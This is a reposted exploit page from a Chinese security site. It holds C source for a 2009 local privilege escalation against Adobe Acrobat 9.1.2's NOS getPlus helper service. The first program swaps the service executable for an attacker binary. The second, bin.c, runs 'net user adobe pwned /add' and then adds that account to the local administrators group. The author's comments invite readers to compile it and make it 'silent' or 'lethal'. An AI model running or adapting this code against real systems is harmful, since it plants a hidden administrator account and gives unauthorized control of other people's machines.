首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit 来源：0xjbrown41@gmail.com 作者：Brown 发布时间：2009-07-22   /* alwaysdirtyneverclean.c AKA Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) BY Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 *********************************************************************************************************** I've been up for nearly 24 hours (only the last few doing research though). This exploit is based on the brief information provided by Nine:Situations:Group (http://www.milw0rm.com/exploits/9199). Exploiting improper permissions is fun. A few notes are in order though. The getPlus service (that I tested, via 9.1.2) isn't installed as an "Automatic" service, therefore making it slightly harder (but not hard) to practically use to your advantage. But I tested running this code under a GUEST account and it worked pretty good (just the first time though). Change the values as needed, compile and run. Things could be more or less silent, lethal or non-lethal... it is completely up to you. Things cannot get much simpler than this :) Tested on Windows XP SP3 + Adobe Acrobat 9.1.2 (installed from adobe's download manager, then updated) But maybe give Adobe a break? 2009 has been a rough year for them already, heh. Sleep time. *********************************************************************************************************** alwaysdirtyneverclean.c */ #include <stdio.h> #include <windows.h> #define DEFAULT_TARGET  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe" #define DEFAULT_BACKUP  "C:\\Program Files\\NOS\\bin\\GetPlus_HelperSvc.exe.bak" #define DEFAULT_EXECUTE "C:\\Documents and Settings\\All Users\\Documents\\bin.exe" //#define DEFAULT_EXECUTE "C:\\WINDOWS\\system32\\calc.exe" int main(int argc, char *argv[]) {      MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);      CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);      // shakee and bakeee      return 0; } ///////////////////////////////////// cut ///////////////////////////////////// /* bin.c FROM Adobe Acrobat 9.1.2 NOS Local Privilege Escalation Exploit (alwaysdirtyneverclean.zip) BY Jeremy Brown 2009 [0xjbrown41@gmail.com] 07.21.2009 */ #include <stdio.h> #include <windows.h> #define CMD "C:\\WINDOWS\\system32\\cmd.exe" #define ONE "/C net user adobe pwned /add" #define TWO "/C net localgroup administrators adobe /add" int main(int argc, char *argv[]) { STARTUPINFO si = {sizeof(STARTUPINFO)}; PROCESS_INFORMATION pi;      CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);      CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);      // mmmmmmmmmmm.. chocolate browie ice cream smoothes are goooood      return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FlyHelp (.CHM File) Local Buff ·MS Office Web Components Sprea ·WINMOD 1.4 (.lst File) Local B ·otsAV 1.77.001 (.ofl File) Loc ·WINMOD 1.4 (.lst) Universal Bu ·Php168 v6 权限提升漏洞 ·DD-WRT (httpd service) Remote ·KMplayer <= 2.9.4.1433 (.srt F ·Soritong MP3 Player 1.0 (SKIN) ·Streaming Audio Player 0.9 (sk ·Windows x86 null-free bindshel ·Mozilla Firefox 3.5 (Font tags   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved